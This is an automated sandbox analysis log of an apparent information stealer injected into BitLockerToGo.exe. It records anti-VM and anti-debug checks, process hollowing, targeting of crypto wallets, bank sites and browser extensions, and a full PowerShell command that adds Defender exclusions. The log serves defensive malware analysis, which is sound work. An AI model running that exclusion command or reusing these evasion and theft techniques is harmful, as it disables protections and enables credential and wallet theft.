                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 6DDAD3
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: C35757
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: BA1F15
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 7C0878
                        Source: C:\ProgramData\GHDAKKJJJK.exeAPI/Special instruction interceptor: Address: 74FD4B
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 8C6D65
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 7EF0C8
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: BD0C8A
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: BE94D3
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: B5FB0E
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 7BCCD1
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: C063AF
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 85A9AD
                        Source: C:\Users\user\AppData\Roaming\service.exeAPI/Special instruction interceptor: Address: 86D552
                        Source: BitLockerToGo.exeBinary or memory string: DIR_WATCH.DLL
                        Source: BitLockerToGo.exeBinary or memory string: SBIEDLL.DLL
                        Source: BitLockerToGo.exeBinary or memory string: API_LOG.DLL
                        Source: BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL10:31:5110:31:5110:31:5110:31:5110:31:5110:31:51DELAYS.TMP%S%SNTDLL.DLL
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_02A017FD
                        Source: C:\Users\user\Desktop\S0FTWARE.exeCode function: 0_3_12E9E248 sldt word ptr [eax]0_3_12E9E248
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5799
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3987
                        Source: C:\ProgramData\GHDAKKJJJK.exeWindow / User API: threadDelayed 799
                        Source: C:\ProgramData\GHDAKKJJJK.exeWindow / User API: threadDelayed 9191
                        Source: C:\Users\user\AppData\Roaming\service.exeWindow / User API: threadDelayed 1804
                        Source: C:\Users\user\AppData\Roaming\service.exeWindow / User API: threadDelayed 8184
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\nss3.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI coverage: 7.9 %
                        Source: C:\Windows\System32\svchost.exe TID: 2616Thread sleep time: -60000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6756Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep count: 5799 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep count: 3987 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep count: 799 > 30
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep time: -239700s >= -30000s
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep count: 9191 > 30
                        Source: C:\ProgramData\GHDAKKJJJK.exe TID: 8044Thread sleep time: -2757300s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep count: 1804 > 30
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep time: -541200s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep count: 8184 > 30
                        Source: C:\Users\user\AppData\Roaming\service.exe TID: 8140Thread sleep time: -2455200s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 7372Thread sleep count: 84 > 30
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\ProgramData\GHDAKKJJJK.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\service.exeLast function: Thread delayed
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A12A37 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A12B4Ah3_2_02A12A37
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A16A05
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A17178
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0A941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0A941
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0CE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0CE96
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0E5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0E5B9
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A18D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_02A18D90
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A17D20
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0C528
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A01D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0C888
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A1785A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0DD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0DD2A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A16E7F
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A12C16 GetSystemInfo,wsprintfA,3_2_02A12C16
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: chrome.exe, 00000005.00000002.2737314403.000007C000B0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: chrome.exe, 00000005.00000002.2725842240.000002781368E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: chrome.exe, 00000005.00000002.2742527483.000007C0015AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                        Source: chrome.exe, 00000005.00000002.2728265641.00000278171F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_pa
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3282779040.0000028B2582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3285247315.0000028B2AE54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.5172263794.0000015B47CC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: msedge.exe, 00000009.00000003.2764858034.00007CF000324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: chrome.exe, 00000005.00000002.2725842240.00000278135E7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2818968256.000001C85A643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: S0FTWARE.exe, 00000000.00000002.2234570138.0000000002248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: svchost.exe, 0000000D.00000002.5171771210.0000015B47C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@_
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: chrome.exe, 00000005.00000002.2734345767.000007C0006F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=31ec732a-8015-48bf-86e8-986a17602f4b
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-68347
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-68363
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-69482
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1F20C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02A1F20C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1A132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A1A132
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0149D mov eax, dword ptr fs:[00000030h]3_2_02A0149D
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A01492 mov eax, dword ptr fs:[00000030h]3_2_02A01492
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0147A mov eax, dword ptr fs:[00000030h]3_2_02A0147A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A19D79 mov eax, dword ptr fs:[00000030h]3_2_02A19D79
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A19D78 mov eax, dword ptr fs:[00000030h]3_2_02A19D78
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A13AB9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_02A13AB9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1E88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_02A1E88C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A28EAE SetUnhandledExceptionFilter,3_2_02A28EAE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C70AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C70AC62

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 protect: page execute and read and write
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A112EC _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_02A112EC
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE09759E
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE0A7097
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE0AF0E3
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EC4F40A
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F37C6D7
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EC50EB5
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EB7DA52
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F057499
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6ADFCE02B
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F07879D
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F062F18
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE7EDA3F
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EB68F1E
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F38D15E
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6ADFD656A
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE7DC6D7
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76EB6E02B
                        Source: C:\ProgramData\AAFIJKKEHJ.exeNtProtectVirtualMemory: Direct from: 0x7FF6AE4BF4E3
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeNtProtectVirtualMemory: Direct from: 0x7FF76F360DB4
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000 value starts with: 4D5A
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A142EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A142EE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A14452 CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_02A14452
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A143C5 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A143C5
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2865008
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A00000
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A01000
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A31000
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A3E000
                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C53000
